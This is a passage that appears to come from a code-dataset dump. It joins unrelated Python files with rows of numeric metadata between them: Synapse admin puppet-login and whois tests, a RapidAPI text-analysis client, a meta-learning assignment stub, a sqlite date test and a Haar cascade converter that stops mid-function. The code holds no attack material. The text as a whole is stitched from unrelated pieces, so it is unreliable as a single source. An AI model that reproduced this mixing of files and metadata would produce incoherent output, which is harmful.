        """Ask the admin API for a puppet access token for the other user."""
        request, channel = self.make_request(
            "POST", self.url, b"{}", access_token=self.admin_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)
        return channel.json_body["access_token"]

    def test_no_auth(self):
        """Try to login as a user without authentication.
        """
        request, channel = self.make_request("POST", self.url, b"{}")

        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

    def test_not_admin(self):
        """Try to login as a user as a non-admin user.
        """
        request, channel = self.make_request(
            "POST", self.url, b"{}", access_token=self.other_user_tok
        )

        self.assertEqual(403, channel.code, msg=channel.json_body)

    def test_send_event(self):
        """Test that sending an event with the puppet token attributes the
        event to the puppeted user.
        """
        # Create a room.
        room_id = self.helper.create_room_as(self.other_user, tok=self.other_user_tok)

        # Login in as the user
        puppet_token = self._get_token()

        # Test that sending works, and generates the event as the right user.
        resp = self.helper.send_event(room_id, "com.example.test", tok=puppet_token)
        event_id = resp["event_id"]
        event = self.get_success(self.store.get_event(event_id))
        self.assertEqual(event.sender, self.other_user)

    def test_devices(self):
        """Tests that logging in as a user doesn't create a new device for them.
        """
        # Login in as the user
        self._get_token()

        # Check that we don't see a new device in our devices list
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=self.other_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # We should only see the one device (from the login in `prepare`)
        self.assertEqual(len(channel.json_body["devices"]), 1)

    def test_logout(self):
        """Test that calling `/logout` with the puppet token invalidates it,
        without affecting the real user's tokens.
        """
        # Login in as the user
        puppet_token = self._get_token()

        # Test that we can successfully make a request
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # Logout with the puppet token
        request, channel = self.make_request(
            "POST", "logout", b"{}", access_token=puppet_token
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # The puppet token should no longer work
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(401, channel.code, msg=channel.json_body)

        # .. but the real user's tokens should still work
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=self.other_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

    def test_user_logout_all(self):
        """Tests that the target user calling `/logout/all` does *not* expire
        the puppet token.
        """
        # Login in as the user
        puppet_token = self._get_token()

        # Test that we can successfully make a request
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # Logout all with the real user token
        request, channel = self.make_request(
            "POST", "logout/all", b"{}", access_token=self.other_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # The puppet token should still work
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # .. but the real user's tokens shouldn't
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=self.other_user_tok
        )
        self.assertEqual(401, channel.code, msg=channel.json_body)

    def test_admin_logout_all(self):
        """Tests that the admin user calling `/logout/all` does expire the
        puppet token.
        """
        # Login in as the user
        puppet_token = self._get_token()

        # Test that we can successfully make a request
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # Logout all with the admin user token
        request, channel = self.make_request(
            "POST", "logout/all", b"{}", access_token=self.admin_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

        # The puppet token should no longer work
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=puppet_token
        )
        self.assertEqual(401, channel.code, msg=channel.json_body)

        # .. but the real user's tokens should still work
        request, channel = self.make_request(
            "GET", "devices", b"{}", access_token=self.other_user_tok
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)

    @unittest.override_config(
        {
            "public_baseurl": "https://example.org/",
            "user_consent": {
                "version": "1.0",
                "policy_name": "My Cool Privacy Policy",
                "template_dir": "/",
                "require_at_registration": True,
                "block_events_error": "You should accept the policy",
            },
            "form_secret": "123secret",
        }
    )
    def test_consent(self):
        """Test that sending a message with the puppet token is not subject
        to the privacy policies.
        """
        # Have the admin user accept the terms.
        self.get_success(self.store.user_set_consent_version(self.admin_user, "1.0"))

        # First, cheekily accept the terms and create a room
        self.get_success(self.store.user_set_consent_version(self.other_user, "1.0"))
        room_id = self.helper.create_room_as(self.other_user, tok=self.other_user_tok)
        self.helper.send_event(room_id, "com.example.test", tok=self.other_user_tok)

        # Now unaccept it and check that we can't send an event
        self.get_success(self.store.user_set_consent_version(self.other_user, "0.0"))
        self.helper.send_event(
            room_id, "com.example.test", tok=self.other_user_tok, expect_code=403
        )

        # Login in as the user
        puppet_token = self._get_token()

        # Sending an event on their behalf should work fine
        self.helper.send_event(room_id, "com.example.test", tok=puppet_token)

    @override_config(
        {"limit_usage_by_mau": True, "max_mau_value": 1, "mau_trial_days": 0}
    )
    def test_mau_limit(self):
        """The puppet token bypasses the monthly-active-user limit."""
        # Create a room as the admin user. This will bump the monthly active users to 1.
        room_id = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)

        # Trying to join as the other user should fail due to reaching MAU limit.
        self.helper.join(
            room_id, user=self.other_user, tok=self.other_user_tok, expect_code=403
        )

        # Logging in as the other user and joining a room should work, even
        # though the MAU limit would stop the user doing so.
        puppet_token = self._get_token()
        self.helper.join(room_id, user=self.other_user, tok=puppet_token)
class WhoisRestTestCase(unittest.HomeserverTestCase):
    """Tests for the whois admin API, at both its `/_synapse/admin/v1` and
    its legacy `/_matrix/client/r0/admin` locations."""

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
    ]

    def prepare(self, reactor, clock, hs):
        self.store = hs.get_datastore()

        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.other_user = self.register_user("user", "pass")
        self.url1 = "/_synapse/admin/v1/whois/%s" % urllib.parse.quote(self.other_user)
        self.url2 = "/_matrix/client/r0/admin/whois/%s" % urllib.parse.quote(
            self.other_user
        )

    def test_no_auth(self):
        """
        Try to get information of a user without authentication.
        """
        request, channel = self.make_request("GET", self.url1, b"{}")
        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

        request, channel = self.make_request("GET", self.url2, b"{}")
        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

    def test_requester_is_not_admin(self):
        """
        If the user is not a server admin, an error is returned.
        """
        self.register_user("user2", "pass")
        other_user2_token = self.login("user2", "pass")

        request, channel = self.make_request(
            "GET", self.url1, access_token=other_user2_token,
        )
        self.assertEqual(403, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])

        request, channel = self.make_request(
            "GET", self.url2, access_token=other_user2_token,
        )
        self.assertEqual(403, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])

    def test_user_is_not_local(self):
        """
        Tests that a lookup for a user that is not local returns a 400
        """
        url1 = "/_synapse/admin/v1/whois/@unknown_person:unknown_domain"
        url2 = "/_matrix/client/r0/admin/whois/@unknown_person:unknown_domain"

        request, channel = self.make_request(
            "GET", url1, access_token=self.admin_user_tok,
        )
        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual("Can only whois a local user", channel.json_body["error"])

        request, channel = self.make_request(
            "GET", url2, access_token=self.admin_user_tok,
        )
        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual("Can only whois a local user", channel.json_body["error"])

    def test_get_whois_admin(self):
        """
        The lookup should succeed for an admin.
        """
        request, channel = self.make_request(
            "GET", self.url1, access_token=self.admin_user_tok,
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(self.other_user, channel.json_body["user_id"])
        self.assertIn("devices", channel.json_body)

        request, channel = self.make_request(
            "GET", self.url2, access_token=self.admin_user_tok,
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(self.other_user, channel.json_body["user_id"])
        self.assertIn("devices", channel.json_body)

    def test_get_whois_user(self):
        """
        The lookup should succeed for a normal user looking up their own information.
        """
        other_user_token = self.login("user", "pass")

        request, channel = self.make_request(
            "GET", self.url1, access_token=other_user_token,
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(self.other_user, channel.json_body["user_id"])
        self.assertIn("devices", channel.json_body)

        request, channel = self.make_request(
            "GET", self.url2, access_token=other_user_token,
        )
        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(self.other_user, channel.json_body["user_id"])
        self.assertIn("devices", channel.json_body)
| 37.236828 | 88 | 0.610794 | 8,390 | 69,968 | 4.93087 | 0.064124 | 0.094271 | 0.069253 | 0.064346 | 0.82219 | 0.807058 | 0.785448 | 0.763766 | 0.749867 | 0.739425 | 0 | 0.016666 | 0.258189 | 69,968 | 1,878 | 89 | 37.256656 | 0.780398 | 0.117725 | 0 | 0.587436 | 0 | 0 | 0.130032 | 0.026682 | 0 | 0 | 0 | 0 | 0.244482 | 1 | 0.064516 | false | 0.055178 | 0.011885 | 0 | 0.093379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0703656c372759d76f6e9d90aa2d026c71e737ab | 1,075 | py | Python | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | 1 | 2021-02-06T13:08:37.000Z | 2021-02-06T13:08:37.000Z | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | null | null | null | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | null | null | null | import requests
from variables import rapidApiKey
def fetchText(url):
    """Call the test1972 RapidAPI text-analysis endpoint for the given page.

    :param url: address of the page whose text should be analysed
    :return: the raw ``requests.Response`` from the API
    """
    baseUrl = "https://test1972.p.rapidapi.com/analyze-text/text"

    querystring = {"url": url}

    headers = {
        'x-rapidapi-key': rapidApiKey,
        'x-rapidapi-host': "test1972.p.rapidapi.com"
    }

    # Without a timeout, requests can block forever if the API stalls.
    response = requests.request(
        "GET", baseUrl, headers=headers, params=querystring, timeout=30
    )

    return response
def pos(url):
    """Call the test1972 RapidAPI part-of-speech tagging endpoint.

    :param url: address of the page whose text should be POS-tagged
    :return: the raw ``requests.Response`` from the API
    """
    baseUrl = "https://test1972.p.rapidapi.com/analyze-text/pos"

    querystring = {"url": url}

    headers = {
        'x-rapidapi-key': rapidApiKey,
        'x-rapidapi-host': "test1972.p.rapidapi.com"
    }

    # Without a timeout, requests can block forever if the API stalls.
    response = requests.request(
        "GET", baseUrl, headers=headers, params=querystring, timeout=30
    )

    return response
def namedEntity(url):
    """Run the rapidapi 'analyze-text/ner' (named entity) endpoint on *url* and return the HTTP response."""
    endpoint = "https://test1972.p.rapidapi.com/analyze-text/ner"
    request_headers = {
        'x-rapidapi-key': rapidApiKey,
        'x-rapidapi-host': "test1972.p.rapidapi.com"
    }
    return requests.request("GET", endpoint, headers=request_headers, params={"url": url})
| 24.431818 | 84 | 0.649302 | 120 | 1,075 | 5.816667 | 0.241667 | 0.077364 | 0.146132 | 0.17192 | 0.885387 | 0.885387 | 0.885387 | 0.885387 | 0.885387 | 0.687679 | 0 | 0.028202 | 0.208372 | 1,075 | 43 | 85 | 25 | 0.792009 | 0 | 0 | 0.62069 | 0 | 0 | 0.29702 | 0.064246 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
07495387115b57ff97fe333ff9177fabf5ea7156 | 5,721 | py | Python | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | 1 | 2020-10-19T12:58:04.000Z | 2020-10-19T12:58:04.000Z | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | null | null | null | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import sklearn.tree
import sklearn.ensemble
import typing
class AbsractMetaLearningModel(object):
    """Base class for meta-learning model selectors.

    Subclasses implement :meth:`fit` and :meth:`predict`; :meth:`score`
    evaluates how well the selected base models would have performed.
    """

    def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
        """
        Takes an input (meta-features) and trains the internal model on it.
        :param df_features: pd.DataFrame
        a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
        meta-feature, calculated over that specific dataset
        :param df_performance: pd.DataFrame
        a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
        performance of a (base-)model on that specific dataset (predictive accuracy)
        """
        raise NotImplementedError("Abstract Method, please subclass")

    def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
        """
        Predicts for a set of datasets (expressed in meta-features) the performance per (base-)model
        :param df_features: pd.DataFrame
        a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
        meta-feature, calculated over that specific dataset
        :return: List[str]
        A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
        perform best
        """
        raise NotImplementedError("Abstract Method, please subclass")

    def score(self, y: pd.DataFrame, y_hat: typing.List[str]) -> typing.List[float]:
        """
        Scores how well the classifiers selected by the meta-model would have performed.
        :param y: pd.DataFrame
        a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
        performance of a (base-)model on that specific dataset (predictive accuracy)
        :param y_hat: typing.List[str]
        A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
        perform best
        :return: List[float]
        The performance of the selected classifier (indicated in y_hat) per task
        """
        # BUGFIX (annotation only): the return annotation said List[str] but the
        # method returns per-task performances, as the docstring already stated.
        return [y[classifier][idx] for idx, classifier in enumerate(y_hat)]
class MetaLearningBestOnAverage(AbsractMetaLearningModel):
    def __init__(self, _):
        """
        Baseline strategy: determine at fit time which base model has the best
        average performance, and always select that model at predict time.
        """
        # Name of the on-average-best base model, determined by fit().
        self.best_model_name = None

    def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
        """
        Train the meta-model.
        :param df_features: pd.DataFrame
        (N, M) frame: one row per base-dataset, one column per meta-feature
        :param df_performance: pd.DataFrame
        (N, D) frame: one row per base-dataset, one column per base-model's
        performance (predictive accuracy) on that dataset
        """
        raise NotImplementedError('Please implement')

    def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
        """
        Predict, per dataset, which base model will perform best.
        :param df_features: pd.DataFrame
        (N, M) frame: one row per base-dataset, one column per meta-feature
        :return: List[str]
        length-N list with the name of the predicted-best base model per dataset
        """
        raise NotImplementedError('Please implement')
class MetaLearningRegressionBased(AbsractMetaLearningModel):
    def __init__(self, expected_models):
        """
        Regression-based meta-learner: keeps one random-forest regressor per
        expected base model, to be trained on the meta-features at fit time.
        """
        # One regressor per base-model name; fixed random_state for reproducibility.
        self.models = {}
        for model in expected_models:
            self.models[model] = sklearn.ensemble.RandomForestRegressor(random_state=0)

    def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
        """
        Train the meta-model.
        :param df_features: pd.DataFrame
        (N, M) frame: one row per base-dataset, one column per meta-feature
        :param df_performance: pd.DataFrame
        (N, D) frame: one row per base-dataset, one column per base-model's
        performance (predictive accuracy) on that dataset
        """
        raise NotImplementedError('Please implement')

    def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
        """
        Predict, per dataset, which base model will perform best.
        :param df_features: pd.DataFrame
        (N, M) frame: one row per base-dataset, one column per meta-feature
        :return: List[str]
        length-N list with the name of the predicted-best base model per dataset
        """
        raise NotImplementedError('Please implement')
| 42.066176 | 119 | 0.674358 | 782 | 5,721 | 4.887468 | 0.15601 | 0.06044 | 0.037677 | 0.065934 | 0.846677 | 0.846677 | 0.846677 | 0.812402 | 0.812402 | 0.812402 | 0 | 0.000235 | 0.254851 | 5,721 | 135 | 120 | 42.377778 | 0.896317 | 0.617025 | 0 | 0.4 | 0 | 0 | 0.079257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.133333 | 0 | 0.566667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4af2f146bc7fb79728efe83340f78968f771b024 | 2,708 | py | Python | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | 1 | 2018-05-29T18:12:13.000Z | 2018-05-29T18:12:13.000Z | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | null | null | null | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | null | null | null | """Tests for simple sqlite3 wrapper for ICS data."""
from datasimple.sqlite import connect
def connect_test():
    """Exercise the comppart() and ds_datetime() SQL functions registered by connect()."""
    db = connect(':memory:')
    with db:
        db.execute("""create table t (a, b)""")
        db.execute("""insert into t (a, b) values (' the part is-ok', '06/22/2017')""")

    def v(exp, sql):
        # Every query yields exactly one row with one column.
        act = list(db.execute(sql))[0][0]
        # The original wrapped this assert in a redundant `if exp != act:` guard.
        assert exp == act, 'Expected {} but got {}'.format(exp, act)

    v('PARTIS0K', """select comppart(a) from t""")
    v('2017', """select strftime('%Y', ds_datetime(b)) from t""")
    v('06', """select strftime('%m', ds_datetime(b)) from t""")
    v('22', """select strftime('%d', ds_datetime(b)) from t""")

    # Every zero-padded / unpadded month-day spelling, with both 2- and 4-digit
    # years, must normalize to the same ISO date components.
    month_days = ('08/22', '08/01', '8/1', '08/1', '8/01')
    for year in ('17', '2017'):
        for md in month_days:
            call = "ds_datetime('{}/{}')".format(md, year)
            v('2017', "select strftime('%Y', {})".format(call))
            v('08', "select strftime('%m', {})".format(call))
            v('22' if md == '08/22' else '01', "select strftime('%d', {})".format(call))
| 49.236364 | 87 | 0.541359 | 403 | 2,708 | 3.55335 | 0.146402 | 0.322626 | 0.150838 | 0.14595 | 0.805168 | 0.791899 | 0.77095 | 0.751397 | 0.751397 | 0 | 0 | 0.123863 | 0.147341 | 2,708 | 54 | 88 | 50.148148 | 0.496319 | 0.016987 | 0 | 0 | 0 | 0.022727 | 0.659262 | 0.273343 | 0 | 0 | 0 | 0 | 0.022727 | 1 | 0.045455 | false | 0 | 0.022727 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ab26d8848c84b7f20c3e30106caf5a220c25af0f | 14,923 | py | Python | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 1,761 | 2015-07-10T23:14:17.000Z | 2022-03-30T07:49:49.000Z | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 487 | 2015-07-07T23:21:20.000Z | 2022-03-30T17:13:22.000Z | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 882 | 2015-08-01T08:34:19.000Z | 2022-03-30T07:36:23.000Z | #!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <iabdalkader@openmv.io>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <kwagyeman@openmv.io>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# Haar Cascade binary converter.
import sys,os
import struct
import argparse
from xml.dom import minidom
def cascade_info_universal(path):
    """Print cascade statistics, dispatching on the XML schema version."""
    doc = minidom.parse(path)
    # Old-style OpenCV cascades have no <stageNum> element.
    if doc.getElementsByTagName('stageNum').length == 0:
        print("Parsing old XML format..")
        cascade_info_old(path)
    else:
        print("Parsing new XML format..")
        cascade_info(path)
def cascade_info(path):
    """Print size/stage/feature/rectangle counts for a new-format cascade XML."""
    doc = minidom.parse(path)
    n_stages = int(doc.getElementsByTagName('stageNum')[0].childNodes[0].nodeValue)

    # One <maxWeakCount> per stage element gives the weak-classifier count.
    stages = [int(node.getElementsByTagName('maxWeakCount')[0].childNodes[0].nodeValue)
              for node in doc.getElementsByTagName('stages')[0].childNodes
              if node.nodeType == 1]
    stage_threshold = doc.getElementsByTagName('stageThreshold')[0:n_stages]

    # Total number of features and their rectangle lists.
    n_features = sum(stages)
    feature = doc.getElementsByTagName('rects')[0:n_features]

    # Detection window size.
    size = [int(doc.getElementsByTagName(tag)[0].childNodes[0].nodeValue)
            for tag in ('width', 'height')]

    n_rectangles = sum(len(f.getElementsByTagName('_')) for f in feature)

    print("size:%dx%d"%(size[0], size[1]))
    print("stages:%d"%len(stages))
    print("features:%d"%n_features)
    print("rectangles:%d"%n_rectangles)
def cascade_info_old(path):
    """Print size/stage/feature/rectangle counts for an old-format cascade XML."""
    doc = minidom.parse(path)
    trees = doc.getElementsByTagName('trees')
    n_stages = len(trees)

    # Each pair of <trees> child nodes (text + element) is one weak classifier.
    stages = [len(t.childNodes)//2 for t in trees][0:n_stages]
    stage_threshold = doc.getElementsByTagName('stage_threshold')[0:n_stages]

    # Total number of features and their per-feature data.
    n_features = sum(stages)
    threshold = doc.getElementsByTagName('threshold')[0:n_features]
    alpha1 = doc.getElementsByTagName('left_val')[0:n_features]
    alpha2 = doc.getElementsByTagName('right_val')[0:n_features]
    feature = doc.getElementsByTagName('rects')[0:n_features]

    # Detection window size, e.g. "20 20".
    size = [int(v) for v in doc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()]

    n_rectangles = sum(len(f.getElementsByTagName('_')) for f in feature)

    print("size:%dx%d"%(size[0], size[1]))
    print("stages:%d"%len(stages))
    print("features:%d"%n_features)
    print("rectangles:%d"%n_rectangles)
def cascade_binary_universal(path, n_stages, name):
    """Convert a cascade XML to the binary format, dispatching on the XML schema version."""
    doc = minidom.parse(path)
    # Old-style OpenCV cascades have no <stageNum> element.
    if doc.getElementsByTagName('stageNum').length == 0:
        print("Converting old XML format..")
        cascade_binary_old(path, n_stages, name)
    else:
        print("Converting new XML format..")
        cascade_binary(path, n_stages, name)
def cascade_binary(path, n_stages, name):
    """Convert a new-format OpenCV Haar cascade XML into a packed binary cascade.

    :param path: path to the OpenCV XML cascade file (new format, with <stageNum>)
    :param n_stages: number of stages to keep (0 keeps all stages)
    :param name: output file name stem; defaults to the XML file's base name
    :raises Exception: if n_stages exceeds the number of stages in the file
    """
    # parse xml file
    xmldoc = minidom.parse(path)
    max_stages = int(xmldoc.getElementsByTagName('stageNum')[0].childNodes[0].nodeValue)
    if n_stages > max_stages:
        raise Exception("The max number of stages is: %d"%(max_stages))
    if n_stages == 0:
        n_stages = max_stages
    # read stages: one <maxWeakCount> per stage element
    stages_elements = xmldoc.getElementsByTagName('stages')
    stages = []
    for node in stages_elements[0].childNodes:
        if node.nodeType == 1:
            stages.append(int(node.getElementsByTagName('maxWeakCount')[0].childNodes[0].nodeValue))
    # BUGFIX: truncate to the requested number of stages (the old-format
    # converter already slices [0:n_stages]). Without this, requesting fewer
    # stages wrote a header claiming all stages while only n_stages thresholds
    # followed, producing a corrupt binary.
    stages = stages[0:n_stages]
    stage_threshold = xmldoc.getElementsByTagName('stageThreshold')[0:n_stages]
    # total number of features
    n_features = int(sum(stages))
    # read feature nodes (threshold is field 3, rect index is field 2)
    internal_nodes = xmldoc.getElementsByTagName('internalNodes')[0:n_features]
    # theres one leafValues pair (alpha1 alpha2) per feature
    leaf_values = xmldoc.getElementsByTagName('leafValues')[0:n_features]
    alpha1 = []
    alpha2 = []
    for val in leaf_values:
        alpha1.append(val.childNodes[0].nodeValue.split()[0])
        alpha2.append(val.childNodes[0].nodeValue.split()[1])
    # read rectangles
    feature = xmldoc.getElementsByTagName('rects')[0:n_features]
    # read cascade size
    size = [int(xmldoc.getElementsByTagName('width')[0].childNodes[0].nodeValue), int(xmldoc.getElementsByTagName('height')[0].childNodes[0].nodeValue)]
    # open output file with the specified name or xml file name
    if not name:
        name = os.path.basename(path).split('.')[0]
    fout = open(name+".cascade", "wb")
    n_rectangles = 0
    for f in feature:
        rects = f.getElementsByTagName('_')
        n_rectangles = n_rectangles + len(rects)
    # write detection window size
    fout.write(struct.pack('i', size[0]))
    fout.write(struct.pack('i', size[1]))
    # write num stages
    fout.write(struct.pack('i', len(stages)))
    # write num feat in stages
    for s in stages:
        fout.write(struct.pack('B', s)) # uint8_t
    # write stages thresholds (fixed point, scaled by 256)
    for t in stage_threshold:
        fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*256))) #int16_t
    # write features threshold 1 per feature (fixed point, scaled by 4096)
    for t in internal_nodes:
        fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue.split()[3])*4096))) #int16_t
    # write alpha1 1 per feature
    for a in alpha1:
        fout.write(struct.pack('h', int(float(a)*256))) #int16_t
    # write alpha2 1 per feature
    for a in alpha2:
        fout.write(struct.pack('h', int(float(a)*256))) #int16_t
    # write num_rects per feature
    for f in internal_nodes:
        idx = int(f.childNodes[0].nodeValue.split()[2])
        rects = feature[idx].getElementsByTagName('_')
        fout.write(struct.pack('B', len(rects))) # uint8_t
    # write rects weights 1 per rectangle
    for f in internal_nodes:
        idx = int(f.childNodes[0].nodeValue.split()[2])
        rects = feature[idx].getElementsByTagName('_')
        for r in rects:
            l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
            fout.write(struct.pack('b', l[4])) #int8_t NOTE: multiply by 4096
    # write rects
    for f in internal_nodes:
        idx = int(f.childNodes[0].nodeValue.split()[2])
        rects = feature[idx].getElementsByTagName('_')
        for r in rects:
            l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
            fout.write(struct.pack('BBBB', l[0], l[1], l[2], l[3])) #uint8_t
    # close explicitly so the data is flushed before callers read the file
    fout.close()
    # print cascade info
    print("size:%dx%d"%(size[0], size[1]))
    print("stages:%d"%len(stages))
    print("features:%d"%n_features)
    print("rectangles:%d"%n_rectangles)
    print("binary cascade generated")
def cascade_binary_old(path, n_stages, name):
    """Convert an old-format OpenCV Haar cascade XML into a packed binary cascade.

    :param path: path to the OpenCV XML cascade file (old format, no <stageNum>)
    :param n_stages: number of stages to keep (0 keeps all stages)
    :param name: output file name stem; defaults to the XML file's base name
    :raises Exception: if n_stages exceeds the number of stages in the file
    """
    #parse xml file
    xmldoc = minidom.parse(path)
    trees = xmldoc.getElementsByTagName('trees')
    max_stages = len(trees)
    if n_stages > max_stages:
        raise Exception("The max number of stages is: %d"%(max_stages))
    if n_stages == 0:
        n_stages = max_stages
    # read stages: each pair of <trees> child nodes (text + element) is one weak classifier
    stages = [len(t.childNodes)//2 for t in trees][0:n_stages]
    stage_threshold = xmldoc.getElementsByTagName('stage_threshold')[0:n_stages]
    # total number of features
    n_features = sum(stages)
    # read features threshold
    threshold = xmldoc.getElementsByTagName('threshold')[0:n_features]
    # theres one of each per feature
    alpha1 = xmldoc.getElementsByTagName('left_val')[0:n_features]
    alpha2 = xmldoc.getElementsByTagName('right_val')[0:n_features]
    # read rectangles
    feature = xmldoc.getElementsByTagName('rects')[0:n_features]
    # read cascade size (single text node, e.g. "20 20")
    size = list(map(int, xmldoc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()))
    # open output file with the specified name or xml file name
    if not name:
        name = os.path.basename(path).split('.')[0]
    # NOTE(review): fout is never closed explicitly; it relies on interpreter
    # cleanup to flush the file — confirm this is acceptable.
    fout = open(name+".cascade", "wb")
    n_rectangles = 0
    for f in feature:
        rects = f.getElementsByTagName('_')
        n_rectangles = n_rectangles + len(rects)
    # write detection window size
    fout.write(struct.pack('i', size[0]))
    fout.write(struct.pack('i', size[1]))
    # write num stages
    fout.write(struct.pack('i', len(stages)))
    # write num feat in stages
    for s in stages:
        fout.write(struct.pack('B', s)) # uint8_t
    # write stages thresholds (fixed point, scaled by 256)
    for t in stage_threshold:
        fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*256))) #int16_t
    # write features threshold 1 per feature (fixed point, scaled by 4096)
    for t in threshold:
        fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*4096))) #int16_t
